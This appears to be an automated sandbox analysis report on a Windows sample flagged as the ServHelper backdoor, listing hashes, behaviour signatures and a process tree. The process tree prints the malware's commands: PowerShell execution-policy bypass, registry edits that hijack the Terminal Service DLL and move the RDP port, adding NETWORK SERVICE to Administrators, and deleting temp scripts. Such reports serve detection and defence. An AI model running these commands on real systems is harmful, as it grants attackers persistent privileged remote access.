Analysis
-
max time kernel
84s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en -
submitted
14-09-2021 13:23
Static task
static1
Behavioral task
behavioral1
Sample
608b93e344bd3dbb09d0af9da6856061.exe
Resource
win7-en
Behavioral task
behavioral2
Sample
608b93e344bd3dbb09d0af9da6856061.exe
Resource
win10-en
General
-
Target
608b93e344bd3dbb09d0af9da6856061.exe
-
Size
4.0MB
-
MD5
608b93e344bd3dbb09d0af9da6856061
-
SHA1
b7c8bd7bace350d3c9c054ebb58f25535d22ee95
-
SHA256
5d45cef43fb4c150c33337fb369a89800f9d235eee1dbdac13a8f6fd13bc1ee4
-
SHA512
6e47bb4688737505af62a8c67cea4143185dc047340d8943d412b5274b229bd24628a31576a3250cdfb69b0b4fcfd74140fe83355f49527e7cf9f465c30ac131
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe 3880 powershell.exe 3880 powershell.exe 3880 powershell.exe 2004 powershell.exe 2004 powershell.exe 2004 powershell.exe 496 powershell.exe 496 powershell.exe 496 powershell.exe 3644 powershell.exe 3644 powershell.exe 3644 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 620 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3644 powershell.exe Token: SeDebugPrivilege 3880 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeDebugPrivilege 496 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
608b93e344bd3dbb09d0af9da6856061.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.exedescription pid process target process PID 1612 wrote to memory of 3644 1612 608b93e344bd3dbb09d0af9da6856061.exe powershell.exe PID 1612 wrote to memory of 3644 1612 608b93e344bd3dbb09d0af9da6856061.exe powershell.exe PID 1612 wrote to memory of 3644 1612 608b93e344bd3dbb09d0af9da6856061.exe powershell.exe PID 3644 wrote to memory of 3780 3644 powershell.exe csc.exe PID 3644 wrote to memory of 3780 3644 powershell.exe csc.exe PID 3644 wrote to memory of 3780 3644 powershell.exe csc.exe PID 3780 wrote to memory of 1644 3780 csc.exe cvtres.exe PID 3780 wrote to memory of 1644 3780 csc.exe cvtres.exe PID 3780 wrote to memory of 1644 3780 csc.exe cvtres.exe PID 3644 wrote to memory of 3880 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 3880 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 3880 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 2004 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 2004 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 2004 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 496 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 496 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 496 3644 powershell.exe powershell.exe PID 3644 wrote to memory of 2312 3644 powershell.exe reg.exe PID 3644 wrote to memory of 2312 3644 powershell.exe reg.exe PID 3644 wrote to memory of 2312 3644 powershell.exe reg.exe PID 3644 wrote to memory of 3904 3644 powershell.exe reg.exe PID 3644 wrote to memory of 3904 3644 powershell.exe reg.exe PID 3644 wrote to memory of 3904 3644 powershell.exe reg.exe PID 3644 wrote to memory of 2552 3644 powershell.exe reg.exe PID 3644 wrote to memory of 2552 3644 powershell.exe reg.exe PID 3644 wrote to memory of 2552 3644 powershell.exe reg.exe PID 3644 wrote to memory of 1908 3644 powershell.exe net.exe PID 3644 wrote to memory of 1908 3644 powershell.exe net.exe PID 3644 wrote to memory of 1908 3644 powershell.exe net.exe PID 1908 wrote to memory of 3652 1908 net.exe net1.exe PID 1908 wrote to memory of 3652 1908 net.exe net1.exe PID 1908 wrote to memory of 3652 1908 net.exe net1.exe PID 3644 wrote to memory of 2496 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 2496 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 2496 3644 powershell.exe cmd.exe PID 2496 wrote to memory of 2620 2496 cmd.exe cmd.exe PID 2496 wrote to memory of 2620 2496 cmd.exe cmd.exe PID 2496 wrote to memory of 2620 2496 cmd.exe cmd.exe PID 2620 wrote to memory of 3880 2620 cmd.exe net.exe PID 2620 wrote to memory of 3880 2620 cmd.exe net.exe PID 2620 wrote to memory of 3880 2620 cmd.exe net.exe PID 3880 wrote to memory of 2892 3880 net.exe net1.exe PID 3880 wrote to memory of 2892 3880 net.exe net1.exe PID 3880 wrote to memory of 2892 3880 net.exe net1.exe PID 3644 wrote to memory of 3120 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 3120 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 3120 3644 powershell.exe cmd.exe PID 3120 wrote to memory of 4024 3120 cmd.exe cmd.exe PID 3120 wrote to memory of 4024 3120 cmd.exe cmd.exe PID 3120 wrote to memory of 4024 3120 cmd.exe cmd.exe PID 4024 wrote to memory of 4028 4024 cmd.exe net.exe PID 4024 wrote to memory of 4028 4024 cmd.exe net.exe PID 4024 wrote to memory of 4028 4024 cmd.exe net.exe PID 4028 wrote to memory of 3328 4028 net.exe net1.exe PID 4028 wrote to memory of 3328 4028 net.exe net1.exe PID 4028 wrote to memory of 3328 4028 net.exe net1.exe PID 3644 wrote to memory of 1688 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 1688 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 1688 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 1828 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 1828 3644 powershell.exe cmd.exe PID 3644 wrote to memory of 1828 3644 powershell.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"C:\Users\Admin\AppData\Local\Temp\608b93e344bd3dbb09d0af9da6856061.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pgf2ogpo\pgf2ogpo.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES555.tmp" "c:\Users\Admin\AppData\Local\Temp\pgf2ogpo\CSC7C53E3D0A2E74C089B16F1D5B1486D26.TMP"4⤵PID:1644
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:496 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2312
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3904 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2552
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3652
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2892
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:4024 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3328
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1688
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1828
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
MD5
29619ffceaf3d3cd68afbfd7c08c4183
SHA175c8c0aa4330a9cea177dd5f81495c138dcbe0b7
SHA256b231535bc203b694e81c4c7444d22daee64dcb8f601b18babe8992022781ba2d
SHA5129525dbda36ca6805ee94027bbaa661e023a018da02b492d929fdb75e1bc2e405144c7a46c82bf6e6e150bdb09b2b80a1ad636ca0e754752974dd6b0bfb3979f6
-
MD5
794bf0ae26a7efb0c516cf4a7692c501
SHA1c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2
SHA25697753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825
SHA51220c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75
-
MD5
7c129454ab18fdeab20f058b08c7cfd4
SHA1520508ab96d7861305168b05e31d6350a8f0f731
SHA2564fca19ce79af84827c7f5df6d9cb2cc44adfd4f8d32f3f6dc8c3ef7c7f88c942
SHA5120d1ec845a95a68b28bffc3853bb89fab2bee35b94f9669846bc1990c8688d8cec650e3644513232bf608c8ee89436d73be76bc058de7f97ddf06d06825cd7246
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
381da61b5528ee653dbf6b3b575121d4
SHA19dd21bc284067bb025c954ed8a16f2d85f1d0ace
SHA25630120c31a8b1bd5f018e67a9668c87111095c922eefafa92d9818f0fee46d064
SHA5129adfbba2803991a07400558d39b3b24a8078fe53c4d326cfbddc111d7096fe57bc725913a126a3cc4a1e7138b0287e4079baf585afcb7b8cd39e28468f37d7ad
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
d310e6793a5986bb7afaa38651449759
SHA132318bee3e00c14a91f04879ccec80a929ba0666
SHA2568154cfbfcf3c5dfe52917784d34f8793f5144895ab275306d7c61f2845c71146
SHA512364adde8d952bc68f1e6f8ec42a03b1eb4c209b8261a77e2f3391501650dc832870a5d616112eed5f695f93027f84fda88788c2788754f49a0b4f1dd8874ba6b